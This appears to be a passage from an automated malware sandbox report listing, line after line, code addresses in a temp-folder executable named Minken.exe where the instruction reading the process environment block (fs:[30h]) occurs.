Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]		12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]		12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]		12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]		12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]		12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]		12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]		12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]		12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]		12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]		12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231592C5 mov eax, dword ptr fs:[00000030h]		12_2_231592C5
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231592C5 mov eax, dword ptr fs:[00000030h]		12_2_231592C5
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A2C3 mov eax, dword ptr fs:[00000030h]		12_2_2315A2C3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A2C3 mov eax, dword ptr fs:[00000030h]		12_2_2315A2C3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A2C3 mov eax, dword ptr fs:[00000030h]		12_2_2315A2C3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A2C3 mov eax, dword ptr fs:[00000030h]		12_2_2315A2C3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A2C3 mov eax, dword ptr fs:[00000030h]		12_2_2315A2C3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317B2C0 mov eax, dword ptr fs:[00000030h]		12_2_2317B2C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317B2C0 mov eax, dword ptr fs:[00000030h]		12_2_2317B2C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317B2C0 mov eax, dword ptr fs:[00000030h]		12_2_2317B2C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317B2C0 mov eax, dword ptr fs:[00000030h]		12_2_2317B2C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317B2C0 mov eax, dword ptr fs:[00000030h]		12_2_2317B2C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317B2C0 mov eax, dword ptr fs:[00000030h]		12_2_2317B2C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317B2C0 mov eax, dword ptr fs:[00000030h]		12_2_2317B2C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320F2F8 mov eax, dword ptr fs:[00000030h]		12_2_2320F2F8
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231492FF mov eax, dword ptr fs:[00000030h]		12_2_231492FF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231602E1 mov eax, dword ptr fs:[00000030h]		12_2_231602E1
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231602E1 mov eax, dword ptr fs:[00000030h]		12_2_231602E1
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231602E1 mov eax, dword ptr fs:[00000030h]		12_2_231602E1
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231FA118 mov ecx, dword ptr fs:[00000030h]		12_2_231FA118
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231FA118 mov eax, dword ptr fs:[00000030h]		12_2_231FA118
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231FA118 mov eax, dword ptr fs:[00000030h]		12_2_231FA118
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231FA118 mov eax, dword ptr fs:[00000030h]		12_2_231FA118
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B136 mov eax, dword ptr fs:[00000030h]		12_2_2314B136
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B136 mov eax, dword ptr fs:[00000030h]		12_2_2314B136
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B136 mov eax, dword ptr fs:[00000030h]		12_2_2314B136
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B136 mov eax, dword ptr fs:[00000030h]		12_2_2314B136
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23151131 mov eax, dword ptr fs:[00000030h]		12_2_23151131
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23151131 mov eax, dword ptr fs:[00000030h]		12_2_23151131
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23210115 mov eax, dword ptr fs:[00000030h]		12_2_23210115
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23180124 mov eax, dword ptr fs:[00000030h]		12_2_23180124
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23156154 mov eax, dword ptr fs:[00000030h]		12_2_23156154
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23156154 mov eax, dword ptr fs:[00000030h]		12_2_23156154
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314C156 mov eax, dword ptr fs:[00000030h]		12_2_2314C156
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E8158 mov eax, dword ptr fs:[00000030h]		12_2_231E8158
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23157152 mov eax, dword ptr fs:[00000030h]		12_2_23157152
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E4144 mov eax, dword ptr fs:[00000030h]		12_2_231E4144
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E4144 mov eax, dword ptr fs:[00000030h]		12_2_231E4144
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E4144 mov ecx, dword ptr fs:[00000030h]		12_2_231E4144
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E4144 mov eax, dword ptr fs:[00000030h]		12_2_231E4144
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E4144 mov eax, dword ptr fs:[00000030h]		12_2_231E4144
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23149148 mov eax, dword ptr fs:[00000030h]		12_2_23149148
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23149148 mov eax, dword ptr fs:[00000030h]		12_2_23149148
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23149148 mov eax, dword ptr fs:[00000030h]		12_2_23149148
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23149148 mov eax, dword ptr fs:[00000030h]		12_2_23149148
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E3140 mov eax, dword ptr fs:[00000030h]		12_2_231E3140
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E3140 mov eax, dword ptr fs:[00000030h]		12_2_231E3140
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E3140 mov eax, dword ptr fs:[00000030h]		12_2_231E3140
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172 mov eax, dword ptr fs:[00000030h]		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E9179 mov eax, dword ptr fs:[00000030h]		12_2_231E9179
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23225152 mov eax, dword ptr fs:[00000030h]		12_2_23225152
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D019F mov eax, dword ptr fs:[00000030h]		12_2_231D019F
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D019F mov eax, dword ptr fs:[00000030h]		12_2_231D019F
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D019F mov eax, dword ptr fs:[00000030h]		12_2_231D019F
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D019F mov eax, dword ptr fs:[00000030h]		12_2_231D019F
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314A197 mov eax, dword ptr fs:[00000030h]		12_2_2314A197
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314A197 mov eax, dword ptr fs:[00000030h]		12_2_2314A197
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314A197 mov eax, dword ptr fs:[00000030h]		12_2_2314A197
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232011A4 mov eax, dword ptr fs:[00000030h]		12_2_232011A4
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232011A4 mov eax, dword ptr fs:[00000030h]		12_2_232011A4
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232011A4 mov eax, dword ptr fs:[00000030h]		12_2_232011A4
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232011A4 mov eax, dword ptr fs:[00000030h]		12_2_232011A4
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231A7190 mov eax, dword ptr fs:[00000030h]		12_2_231A7190
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23190185 mov eax, dword ptr fs:[00000030h]		12_2_23190185
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316B1B0 mov eax, dword ptr fs:[00000030h]		12_2_2316B1B0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320C188 mov eax, dword ptr fs:[00000030h]		12_2_2320C188
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320C188 mov eax, dword ptr fs:[00000030h]		12_2_2320C188
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232261E5 mov eax, dword ptr fs:[00000030h]		12_2_232261E5
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318D1D0 mov eax, dword ptr fs:[00000030h]		12_2_2318D1D0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318D1D0 mov ecx, dword ptr fs:[00000030h]		12_2_2318D1D0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231CE1D0 mov eax, dword ptr fs:[00000030h]		12_2_231CE1D0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231CE1D0 mov eax, dword ptr fs:[00000030h]		12_2_231CE1D0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231CE1D0 mov ecx, dword ptr fs:[00000030h]		12_2_231CE1D0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231CE1D0 mov eax, dword ptr fs:[00000030h]		12_2_231CE1D0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231CE1D0 mov eax, dword ptr fs:[00000030h]		12_2_231CE1D0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231801F8 mov eax, dword ptr fs:[00000030h]		12_2_231801F8
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232161C3 mov eax, dword ptr fs:[00000030h]		12_2_232161C3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232161C3 mov eax, dword ptr fs:[00000030h]		12_2_232161C3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231F71F9 mov esi, dword ptr fs:[00000030h]		12_2_231F71F9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232251CB mov eax, dword ptr fs:[00000030h]		12_2_232251CB
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]		12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]		12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]		12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]		12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]		12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]		12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]		12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]		12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]		12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]		12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]		12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]		12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]		12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231551ED mov eax, dword ptr fs:[00000030h]		12_2_231551ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316E016 mov eax, dword ptr fs:[00000030h]		12_2_2316E016
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316E016 mov eax, dword ptr fs:[00000030h]		12_2_2316E016
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316E016 mov eax, dword ptr fs:[00000030h]		12_2_2316E016
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316E016 mov eax, dword ptr fs:[00000030h]		12_2_2316E016
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D4000 mov ecx, dword ptr fs:[00000030h]		12_2_231D4000
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321903E mov eax, dword ptr fs:[00000030h]		12_2_2321903E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321903E mov eax, dword ptr fs:[00000030h]		12_2_2321903E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321903E mov eax, dword ptr fs:[00000030h]		12_2_2321903E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321903E mov eax, dword ptr fs:[00000030h]		12_2_2321903E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E6030 mov eax, dword ptr fs:[00000030h]		12_2_231E6030
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314A020 mov eax, dword ptr fs:[00000030h]		12_2_2314A020
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314C020 mov eax, dword ptr fs:[00000030h]		12_2_2314C020
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231F705E mov ebx, dword ptr fs:[00000030h]		12_2_231F705E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231F705E mov eax, dword ptr fs:[00000030h]		12_2_231F705E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23225060 mov eax, dword ptr fs:[00000030h]		12_2_23225060
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23152050 mov eax, dword ptr fs:[00000030h]		12_2_23152050
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317B052 mov eax, dword ptr fs:[00000030h]		12_2_2317B052
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D6050 mov eax, dword ptr fs:[00000030h]		12_2_231D6050
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317C073 mov eax, dword ptr fs:[00000030h]		12_2_2317C073
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]		12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov ecx, dword ptr fs:[00000030h]		12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]		12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]		12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]		12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]		12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]		12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]		12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]		12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]		12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]		12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]		12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]		12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231CD070 mov ecx, dword ptr fs:[00000030h]		12_2_231CD070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D106E mov eax, dword ptr fs:[00000030h]		12_2_231D106E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23155096 mov eax, dword ptr fs:[00000030h]		12_2_23155096
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318909C mov eax, dword ptr fs:[00000030h]		12_2_2318909C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317D090 mov eax, dword ptr fs:[00000030h]		12_2_2317D090
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317D090 mov eax, dword ptr fs:[00000030h]		12_2_2317D090
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314D08D mov eax, dword ptr fs:[00000030h]		12_2_2314D08D
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232160B8 mov eax, dword ptr fs:[00000030h]		12_2_232160B8
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232160B8 mov ecx, dword ptr fs:[00000030h]		12_2_232160B8
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231DD080 mov eax, dword ptr fs:[00000030h]		12_2_231DD080
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231DD080 mov eax, dword ptr fs:[00000030h]		12_2_231DD080
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315208A mov eax, dword ptr fs:[00000030h]		12_2_2315208A
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E80A8 mov eax, dword ptr fs:[00000030h]		12_2_231E80A8
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D20DE mov eax, dword ptr fs:[00000030h]		12_2_231D20DE
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231790DB mov eax, dword ptr fs:[00000030h]		12_2_231790DB
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]		12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov ecx, dword ptr fs:[00000030h]		12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov ecx, dword ptr fs:[00000030h]		12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]		12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov ecx, dword ptr fs:[00000030h]		12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov ecx, dword ptr fs:[00000030h]		12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]		12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]		12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]		12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]		12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]		12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]		12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]		12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]		12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]		12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]		12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]		12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]		12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231CD0C0 mov eax, dword ptr fs:[00000030h]		12_2_231CD0C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231CD0C0 mov eax, dword ptr fs:[00000030h]		12_2_231CD0C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314C0F0 mov eax, dword ptr fs:[00000030h]		12_2_2314C0F0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231920F0 mov ecx, dword ptr fs:[00000030h]		12_2_231920F0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231750E4 mov eax, dword ptr fs:[00000030h]		12_2_231750E4
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231750E4 mov ecx, dword ptr fs:[00000030h]		12_2_231750E4
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314A0E3 mov ecx, dword ptr fs:[00000030h]		12_2_2314A0E3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232250D9 mov eax, dword ptr fs:[00000030h]		12_2_232250D9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231580E9 mov eax, dword ptr fs:[00000030h]		12_2_231580E9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D60E0 mov eax, dword ptr fs:[00000030h]		12_2_231D60E0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23150710 mov eax, dword ptr fs:[00000030h]		12_2_23150710
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318F71F mov eax, dword ptr fs:[00000030h]		12_2_2318F71F
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318F71F mov eax, dword ptr fs:[00000030h]		12_2_2318F71F
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23180710 mov eax, dword ptr fs:[00000030h]		12_2_23180710
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321972B mov eax, dword ptr fs:[00000030h]		12_2_2321972B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320F72E mov eax, dword ptr fs:[00000030h]		12_2_2320F72E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23157703 mov eax, dword ptr fs:[00000030h]		12_2_23157703
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23155702 mov eax, dword ptr fs:[00000030h]		12_2_23155702
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23155702 mov eax, dword ptr fs:[00000030h]		12_2_23155702
